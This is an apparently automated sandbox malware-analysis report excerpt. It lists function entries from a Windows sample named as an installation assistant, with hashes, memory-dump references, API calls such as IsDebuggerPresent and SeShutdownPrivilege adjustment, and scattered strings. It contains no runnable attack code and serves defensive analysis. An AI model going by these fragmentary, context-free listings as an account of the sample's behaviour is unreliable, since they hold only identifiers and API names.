                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction ID: 03ad40331bdb71c61c150dc1f2fc3d4bb55a497095be6381684fbe9f7a94dd3f
                                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction Fuzzy Hash: 4FF0F4725016547AC6211EE98D00BDB36989F8337CF200725E86793ED1DB75DC0BC6AD
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695AB4
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695AF4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID:
                                                          • API String ID: 323602529-0
                                                          • Opcode ID: 3a56560cac2272d6aadfe90bf58a2fb243490d791f3dae34bb8f15658792ecbc
                                                          • Instruction ID: 1e4da6cd37c862c771ccb5733bca018fe278aae17e45c36e0da7a2e47ff5ee45
                                                          • Opcode Fuzzy Hash: 3a56560cac2272d6aadfe90bf58a2fb243490d791f3dae34bb8f15658792ecbc
                                                          • Instruction Fuzzy Hash: C3514871101B01DBE725CF25C895BE7BBF4BB05718F448A1DD4AA4BBA1DB30B949CB88
                                                          APIs
                                                          • GetLastError.KERNEL32(6C6C6DD8,0000000C), ref: 6C69EF52
                                                          • ExitThread.KERNEL32 ref: 6C69EF59
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorExitLastThread
                                                          • String ID:
                                                          • API String ID: 1611280651-0
                                                          • Opcode ID: b31ca9648009b22f556b52c84eff90aba42d105ac1294219b64a4a769cdfed76
                                                          • Instruction ID: a49450de1a417f6b6cfd749f119004961ed910509e3c3aec34d73de00d9ae07c
                                                          • Opcode Fuzzy Hash: b31ca9648009b22f556b52c84eff90aba42d105ac1294219b64a4a769cdfed76
                                                          • Instruction Fuzzy Hash: FFF0C8716006019FDB00AFB1C449ABD3774FF42314F144649E00697751CF759946CB9D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: 72e42e4e0bec003cb93dcc069b6772fcd671b572dc6c411fb6a1c22f550b0600
                                                          • Instruction ID: cb56654866b9ed5f1838aa400ef20e1880af6516bc6807aec6b8b1709a5def3e
                                                          • Opcode Fuzzy Hash: 72e42e4e0bec003cb93dcc069b6772fcd671b572dc6c411fb6a1c22f550b0600
                                                          • Instruction Fuzzy Hash: 40113A71A0420EAFCB05CF99E94599B7BF9EF89314F144069F815AB301D671ED12CBA8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction ID: 5511e273bc12e5569bbfdb609390b1fde890699123fc7c0c763476235f76d097
                                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction Fuzzy Hash: 83018F72C01159BFCF029FE88C00AEE7FB5AF09304F100165ED24F22A0E7718A65DB88
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C6B4115,?,?,00000000,?,6C6B4115,00000000,0000000C), ref: 6C6B4474
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 723c4a7164e9039355078fde1b6dce2d79ebabc188435d13a71bb4b114a8a5e7
                                                          • Instruction ID: 6565b56338e3e8197de3e0730f3ca61bc65ced23e588ff997f6b129fcb462601
                                                          • Opcode Fuzzy Hash: 723c4a7164e9039355078fde1b6dce2d79ebabc188435d13a71bb4b114a8a5e7
                                                          • Instruction Fuzzy Hash: A8D06C3210010DBBDF028E85DC46EEA3BAAFB88714F014040BA1856020C772E961AB94
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction ID: 48bc27f6c4b0cae721cd04502dae26d08f8f670360c68f2606d3d0f9951f6bde
                                                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: g)''
                                                          • API String ID: 4218353326-3487984327
                                                          • Opcode ID: 73d50f39ed4a29c8fb88e5343529986a55981491b49d2d7980c0f16fffccc660
                                                          • Instruction ID: 461c1fafff5e516ef54c7f407e629949781c7bd2534db69239b25c09d1100c25
                                                          • Opcode Fuzzy Hash: 73d50f39ed4a29c8fb88e5343529986a55981491b49d2d7980c0f16fffccc660
                                                          • Instruction Fuzzy Hash: 8A631471644B028FC728CF28C8D0AD5B7F3BFD53187198A6DC0AA4BA59E774B54ACB44
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 6C695D6A
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C695D76
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C695D84
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C695DAB
                                                          • NtInitiatePowerAction.NTDLL ref: 6C695DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3256374457-3733053543
                                                          • Opcode ID: 6cff08d9ea64205c57d281dbb323178e7ece919c923a68e3f1006de469ba1b4a
                                                          • Instruction ID: 26fe5c9fcd14f2cf29b40ffc8b4f9fdb22ebfbfe97f5a5d7fc60e15faffd5fc1
                                                          • Opcode Fuzzy Hash: 6cff08d9ea64205c57d281dbb323178e7ece919c923a68e3f1006de469ba1b4a
                                                          • Instruction Fuzzy Hash: 77F024B0604300BBEA106F64DD0EB5A3BB4EF41701F014528F942A60C0D7706895CBA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \j`7$\j`7$j
                                                          • API String ID: 0-3644614255
                                                          • Opcode ID: 7eaa51baa57ef79ccfbb6bd5d0afbf1182f81fbdd2c9719bd41946508120c86f
                                                          • Instruction ID: 6dc4e94a12a5100936726e3d78bc6a6c40dd0160ebb9d8cd61f3732e9f8142cc
                                                          • Opcode Fuzzy Hash: 7eaa51baa57ef79ccfbb6bd5d0afbf1182f81fbdd2c9719bd41946508120c86f
                                                          • Instruction Fuzzy Hash: F542237460D3828FDB14CF68C88466ABBE1ABDA354F144E6EE4A5C7B60D334D885CB53
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C7284B1
                                                            • Part of subcall function 6C72993B: __EH_prolog.LIBCMT ref: 6C729940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 1$`)K$h)K
                                                          • API String ID: 3519838083-3935664338
                                                          • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                          • Instruction ID: 90a6bf94a7c939ce21044c1b8ef98dde20a6b4ecf68b0e257585216e0d14a221
                                                          • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                          • Instruction Fuzzy Hash: E1F28D70E04248DFDB11CFA8C988BDDBBB5AF59308F284099E449EB781D7799A85CF11
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C71AEF4
                                                            • Part of subcall function 6C71E622: __EH_prolog.LIBCMT ref: 6C71E627
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $h%K
                                                          • API String ID: 3519838083-1737110039
                                                          • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                          • Instruction ID: 0ed9b507fd9ae46d58fe28bd60504edaf38cd6287317a01d763ce2004ccd9c02
                                                          • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                          • Instruction Fuzzy Hash: A5538B70909258DFDB15CFA4CA98BDDBBB4AF15308F1840E8D449A7B91CB70AE89CF51
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C6A0279
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C6A0283
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C6A0290
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID: Dt*%
                                                          • API String ID: 3906539128-1118161045
                                                          • Opcode ID: f6d69062ceb4457d888109a633ff832375580343736ff15be6521bf57d4b3006
                                                          • Instruction ID: 3721eb09cbd1ce3e2f42f394561874365fb5617cb3d3105b6c16fc4b60d7f0c8
                                                          • Opcode Fuzzy Hash: f6d69062ceb4457d888109a633ff832375580343736ff15be6521bf57d4b3006
                                                          • Instruction Fuzzy Hash: FD31C47491121D9BCB21DF69D888BDDBBB4BF09314F6041EAE41DA7250EB709F858F48
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $J
                                                          • API String ID: 3519838083-1755042146
                                                          • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                          • Instruction ID: 20f400f47bd88962062e589962b2ae02a912ef34f886c325d8a123630f173f9a
                                                          • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                          • Instruction Fuzzy Hash: FFE2F370905288DFEF01CFA8C658BDDBBF4AF25308F2480A9E855AB781C778D945CB65
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6F6CE5
                                                            • Part of subcall function 6C6CCC2A: __EH_prolog.LIBCMT ref: 6C6CCC2F
                                                            • Part of subcall function 6C6CE6A6: __EH_prolog.LIBCMT ref: 6C6CE6AB
                                                            • Part of subcall function 6C6F6A0E: __EH_prolog.LIBCMT ref: 6C6F6A13
                                                            • Part of subcall function 6C6F6837: __EH_prolog.LIBCMT ref: 6C6F683C
                                                            • Part of subcall function 6C6FA143: __EH_prolog.LIBCMT ref: 6C6FA148
                                                            • Part of subcall function 6C6FA143: ctype.LIBCPMT ref: 6C6FA16C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ctype
                                                          • String ID:
                                                          • API String ID: 1039218491-3916222277
                                                          • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                          • Instruction ID: 786d9d5514ae6e86fe972bcfcf812474bb6e4791c29f8bf6b4d3923daeef72cd
                                                          • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                          • Instruction Fuzzy Hash: BF03CE30905248DEDF11CFA4C954BDCBBB2AF1630CF2440DAD46567A91DB349B8ACF6A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3J$`/J$`1J$p0J
                                                          • API String ID: 0-2826663437
                                                          • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                          • Instruction ID: d6fac4d13503aa4bd14821d89ba414eb6d70e6dde8859a1b2e39275d430c0221
                                                          • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                          • Instruction Fuzzy Hash: BA410A71F10A200AF3888E7B9C855667FC3C7C9346B49C23DD965C7AD9DA7DC40792A4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: W
                                                          • API String ID: 3519838083-655174618
                                                          • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                          • Instruction ID: 91400a84ab676224a344340b3956043a21fe718266bca1c749cfd134813321d7
                                                          • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                          • Instruction Fuzzy Hash: E7B27D70A05299DFDB10CFA8C698B9DBBB4BF49308F2440A9E845EB752C779DD41CB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,6C69F235,?,?,?,?), ref: 6C69F19F
                                                          • TerminateProcess.KERNEL32(00000000,?,6C69F235,?,?,?,?), ref: 6C69F1A6
                                                          • ExitProcess.KERNEL32 ref: 6C69F1B8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 7d9a101348e231598a5c542c9799ef935acfb8ad9ca5713567eafc2e0abbdbda
                                                          • Instruction ID: 625393a6140fc7b5afa98d43fad03e4c8ba8d3add5a93930ff0ecd1490546a47
                                                          • Opcode Fuzzy Hash: 7d9a101348e231598a5c542c9799ef935acfb8ad9ca5713567eafc2e0abbdbda
                                                          • Instruction Fuzzy Hash: 2AE04F31100108AFCF016F55C8489A93BB8FB46366F110414F409C6520CF75DE82CA89
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C71489B
                                                            • Part of subcall function 6C715FC9: __EH_prolog.LIBCMT ref: 6C715FCE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @ K
                                                          • API String ID: 3519838083-4216449128
                                                          • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                          • Instruction ID: ccd0d27489a28458ca1401015dd6ffe9ee23ea7c0d3039d715dbc4b12aa97b2c
                                                          • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                          • Instruction Fuzzy Hash: 35D1EF71D082048FDB24CFA4CA94BDEBBF6FB8431CF19812AE405ABE85CB749945DB15
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: x=J
                                                          • API String ID: 3519838083-1497497802
